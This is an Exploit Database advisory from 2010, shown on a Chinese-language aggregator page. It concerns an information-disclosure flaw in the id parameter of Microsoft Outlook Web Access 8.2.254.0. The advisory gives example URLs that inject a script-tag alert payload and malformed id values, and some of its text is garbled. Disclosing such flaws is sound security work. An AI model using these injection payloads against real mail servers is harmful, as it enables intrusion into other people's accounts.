Microsoft Outlook Web Access (OWA) 8.2.254.0 – Information Disclosure

• Exploit Database
• 112 阅读

• 作者： Praveen Darshanam
  日期： 2010-05-24
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12728/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$   "Microsoft Outlook Web Access (OWA) version 8.2.254.0"   OS: Windows Server 2003   Internet Explorer 7   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$   There is an information disclosure vulnerability in "Microsoft Outlook Web Access (OWA) version 8.2.254.0".   The issue is with the id parameter.   Following are different exploitation techniques:   https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script> >   https://example.com/owa/?ae=Folder&t=IPF.Note&id=   https://example.com/owa/?ae=Folder&t=IPF.Note&id=A       Best Regards, Praveen Darshanam, Security Researcher, INDIA